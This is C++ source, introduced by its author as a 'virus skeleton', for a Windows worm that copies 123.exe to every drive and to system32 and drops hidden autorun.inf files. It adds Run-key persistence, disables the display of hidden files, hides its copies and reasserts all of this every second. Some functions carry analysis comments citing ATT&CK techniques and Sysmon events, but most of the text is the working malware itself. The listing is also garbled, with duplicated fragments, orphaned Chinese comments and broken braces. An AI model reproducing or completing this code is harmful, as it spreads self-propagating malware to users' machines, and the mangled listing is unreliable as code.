==========================================================================================================
Language: C++  IDE: Eclipse
Introduction: This is a simple skeleton of a virus. Its functions
copy it to every drive, to system32 and to removable drives; it can
run with
Windows, hide the virus files and forbid showing hidden files. I will add more functions to it, so thank you.
===========================================================================================================
windows and hide the virus files, forbid show the hidden files I will add more function to it so thank you
===========================================================================================================
#include <windows.h>
using namespace std;
using namespace std;
/*============================
Create or modify a numeric (DWORD) registry value
============================*/
void CreateDWORDReg(HKEY hRoot, char *szSubKey, char *ValueName, DWORD Data) {
HKEY hKey;
//打开注册表,不存在则创建。
long lRet= RegCreateKeyEx(hRoot, szSubKey, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lRet != ERROR_SUCCESS) {
修改或创建数字键值
============================*/
void CreateDWORDReg(HKEY hRoot, char *szSubKey, char *ValueName, DWORD Data) {
HKEY hKey;
//打开注册表,不存在则创建。
long lRet= RegCreateKeyEx(hRoot, szSubKey, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lRet != ERROR_SUCCESS) {
return;
}
DWORD dwSize = sizeof(DWORD);
//修改键值,不存在则创建。
lRet = RegSetValueEx(hKey, ValueName, 0, REG_DWORD, (BYTE*)&Data, dwSize);
if (lRet != ERROR_SUCCESS) {
return;
DWORD dwSize = sizeof(DWORD);
//修改键值,不存在则创建。
lRet = RegSetValueEx(hKey, ValueName, 0, REG_DWORD, (BYTE*)&Data, dwSize);
if (lRet != ERROR_SUCCESS) {
return;
}
RegCloseKey(hKey);
}
RegCloseKey(hKey);
}
/*============================
Create or modify a string (REG_SZ) registry value.

hRoot     - predefined root key the subkey path is relative to
szSubKey  - subkey path; created if it does not exist
ValueName - name of the value to write
Data      - string written as the value data

Returns nothing and reports nothing: both failure paths return
silently, so a caller cannot tell whether the write happened.

Analysis note: this is the registry-write primitive used by the
callers in this file (ATT&CK T1112, Modify Registry). Registry
auditing, e.g. Sysmon event ID 13 (value set), records each write
together with the writing process image.
============================*/
void CreateStringReg(HKEY hRoot, char *szSubKey, char* ValueName, char *Data) {
HKEY hKey;
// Open the registry key; create it if it does not exist.
// KEY_ALL_ACCESS is requested although only a value write follows.
long lRet=RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lRet!=ERROR_SUCCESS) {
// printf("error no RegCreateKeyEx %s\n", szSubKey);
return;
}
// Set the value; it is created if it does not exist.
lRet=RegSetValueEx(hKey, ValueName, 0, REG_SZ, (BYTE*)Data, strlen(Data));
if (lRet!=ERROR_SUCCESS) {
// printf("error no RegSetValueEx %s\n", ValueName);
return;
}
RegCloseKey(hKey);
}
修改或创建字符键值
============================*/
// Create or modify a string (REG_SZ) registry value named ValueName under
// hRoot\szSubKey, creating the subkey if needed. Both failure paths return
// silently, so a caller cannot tell whether the write happened.
// Analysis note: registry-write primitive (ATT&CK T1112); registry auditing
// such as Sysmon event ID 13 (value set) records each write.
void CreateStringReg(HKEY hRoot, char *szSubKey, char* ValueName, char *Data) {
HKEY hKey;
// Open the registry key; create it if it does not exist.
long lRet=RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lRet!=ERROR_SUCCESS) {
// printf("error no RegCreateKeyEx %s\n", szSubKey);
return;
}
// Set the value; it is created if it does not exist.
lRet=RegSetValueEx(hKey, ValueName, 0, REG_SZ, (BYTE*)Data, strlen(Data));
if (lRet!=ERROR_SUCCESS) {
// printf("error no RegSetValueEx %s\n", ValueName);
return;
}
RegCloseKey(hKey);
}
/*============================
Forbid showing hidden files.

Writes CheckedValue = 0 under the Explorer "Hidden\SHOWALL" policy
key in HKEY_LOCAL_MACHINE through CreateDWORDReg. The author's stated
purpose is to stop Explorer from displaying hidden files.

Analysis note: a CheckedValue of 0 at this path is a host indicator
of tampering (ATT&CK T1564.001, Hidden Files and Directories); the
stock Windows value is believed to be 1 - confirm against a clean
image of the same OS build. Restoring the value only holds once the
writing process has been stopped.
============================*/
void ForbidShow() {
HKEY hKey;
CreateDWORDReg(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",
"CheckedValue", 00000000);
RegCloseKey(hKey);
}
禁止显示隐藏文件
============================*/
// Forbid showing hidden files: writes CheckedValue = 0 under the Explorer
// "Hidden\SHOWALL" key in HKEY_LOCAL_MACHINE through CreateDWORDReg.
// Analysis note: a CheckedValue of 0 at this path is a host indicator of
// tampering (ATT&CK T1564.001); compare with a clean image of the same build.
void ForbidShow() {
HKEY hKey;
CreateDWORDReg(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",
"CheckedValue", 00000000);
RegCloseKey(hKey);
}
/*============================
Start automatically with Windows.

Writes a value named "123" with data C:\WINDOWS\system32\123.exe
under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
through CreateStringReg.

Analysis note: this is Run-key persistence (ATT&CK T1547.001). The
value name, the data path and the key are all fixed strings, so they
serve directly as host indicators; autostart inventory tools and
registry auditing (e.g. Sysmon event ID 13) expose the entry.
============================*/
void RunWithWindows() {
HKEY hKey;
CreateStringReg(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "123",
"C:\\WINDOWS\\system32\\123.exe");
RegCloseKey(hKey);
}
随windows自动运行
============================*/
// Start automatically with Windows: writes value "123" =
// C:\WINDOWS\system32\123.exe under the HKLM ...\CurrentVersion\Run key
// through CreateStringReg.
// Analysis note: Run-key persistence (ATT&CK T1547.001); the fixed value
// name and path are host indicators visible to autostart inventory tools.
void RunWithWindows() {
HKEY hKey;
CreateStringReg(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "123",
"C:\\WINDOWS\\system32\\123.exe");
RegCloseKey(hKey);
}
/*============================
Get all drives
============================*/
void GetLocalDriversPath(char path[255][255]) {
char s[255]={0};
GetLogicalDriveStrings(sizeof(s), s);
int i=0, m, n;
for (m=0; s[i]!=0&&s[i+1]!=0; m++) {
得到所有驱动器
============================*/
void GetLocalDriversPath(char path[255][255]) {
char s[255]={0};
GetLogicalDriveStrings(sizeof(s), s);
int i=0, m, n;
for (m=0; s[i]!=0&&s[i+1]!=0; m++) {
for (n=0; s[i]!=0; i++, n++) {
path[m][n]=s[i];
}
i++;
}
path[m][n]=s[i];
}
i++;
}
}
/*============================
Copy the file to the target directories
============================*/
void Copy() {
char topath[255][255]={0};
char path[255]={0};
GetLocalDriversPath(topath);
GetCurrentDirectory(sizeof(path),path);
strcat(path,"\\123.exe");
for (int i=0; topath[i][0]!=0; i++) {
strcat(topath[i],"\\123.exe");
HANDLE hFile;
CopyFile (path,topath[i],false);
复制文件到目标目录
============================*/
// Copy the file 123.exe from the current directory to each path returned by
// GetLocalDriversPath and to C:\WINDOWS\system32.
// Analysis note: the result is a same-named executable at the root of every
// enumerated drive plus one under system32 (ATT&CK T1091 when the drive is
// removable). File-creation telemetry (e.g. Sysmon event ID 11) for an .exe
// written to a drive root or to system32 by a non-installer process is the
// observable to alert on.
void Copy() {
char topath[255][255]={0};
char path[255]={0};
GetLocalDriversPath(topath);
// Source path = current working directory + "\123.exe".
GetCurrentDirectory(sizeof(path),path);
strcat(path,"\\123.exe");
// Walk the drive list until the first empty entry.
for (int i=0; topath[i][0]!=0; i++) {
strcat(topath[i],"\\123.exe");
HANDLE hFile;
// Third argument false = do not fail if the target exists (overwrite).
CopyFile (path,topath[i],false);
CloseHandle(hFile);
}
CopyFile (path,"C:\\WINDOWS\\system32\\123.exe",false);
}
/*============================
Generate autorun.inf
============================*/
void SetAutorun() {
char topath[255][255]={0};
GetLocalDriversPath(topath);
char autorun[512]="[AutoRun] \r\n open=123.exe shell\\open=打开(&o)\r\n shell\\open\\Command=123.exe \r\n shell\\explore=资源管理器(&x) \r\n shell\\explore\\Command=\"123.exe-e\" ";
}
CopyFile (path,"C:\\WINDOWS\\system32\\123.exe",false);
}
/*============================
生成autorun
============================*/
void SetAutorun() {
char topath[255][255]={0};
GetLocalDriversPath(topath);
char autorun[512]="[AutoRun] \r\n open=123.exe shell\\open=打开(&o)\r\n shell\\open\\Command=123.exe \r\n shell\\explore=资源管理器(&x) \r\n shell\\explore\\Command=\"123.exe-e\" ";
/* [AutoRun]
open=123.exe
shell\open=打开(&O)
shell\open\Command=123.exe
shell\explore=资源管理器(&X)
shell\explore\Command="123.exe -e"
*/
open=123.exe
shell\open=打开(&O)
shell\open\Command=123.exe
shell\explore=资源管理器(&X)
shell\explore\Command="123.exe -e"
*/
char Name[255]="\\autorun.inf";
for (int i=0; topath[i][0]!=0; i++) {
strcat(topath[i], Name);
HANDLE hFile;
hFile=CreateFile(topath[i],GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN,NULL);
DWORD dwWrite;
WriteFile(hFile, &autorun, strlen(autorun), &dwWrite, NULL);
CloseHandle(hFile);
}
}
for (int i=0; topath[i][0]!=0; i++) {
strcat(topath[i], Name);
HANDLE hFile;
hFile=CreateFile(topath[i],GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN,NULL);
DWORD dwWrite;
WriteFile(hFile, &autorun, strlen(autorun), &dwWrite, NULL);
CloseHandle(hFile);
}
}
/*============================
Hide files
============================*/
void Hide() {
char FilesPath[255][255]= { 0 };
char FileName[255]="\\123.exe";
隐藏文件
============================*/
void Hide() {
char FilesPath[255][255]= { 0 };
char FileName[255]="\\123.exe";
GetLocalDriversPath(FilesPath);
for (int i=0; FilesPath[i][0]!=0; i++) {
strcat(FilesPath[i], FileName);
SetFileAttributes(FilesPath[i],FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
}
for (int i=0; FilesPath[i][0]!=0; i++) {
strcat(FilesPath[i], FileName);
SetFileAttributes(FilesPath[i],FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
}
SetFileAttributes("C:\\WINDOWS\\system32\\123.exe",FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
}
/*============================
Main function
============================*/
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nShowCmd)
{
主函数
============================*/
// Entry point. Loops forever, calling the five routines of this file in
// order and then sleeping 1000 ms before the next pass.
// Analysis note: because every pass rewrites the Run value, the SHOWALL
// value, the copied executables, autorun.inf and the file attributes,
// any artifact removed by hand is restored within about a second while this
// process is alive. Remediation therefore starts with terminating the
// process, then removing the registry values and files. The once-per-second
// repetition of identical registry and file writes is itself a behavioural
// signal in endpoint telemetry.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nShowCmd)
{
while(1){
RunWithWindows();
ForbidShow();
Copy();
SetAutorun();
Hide();
Sleep(1000);
}
}
RunWithWindows();
ForbidShow();
Copy();
SetAutorun();
Hide();
Sleep(1000);
}
}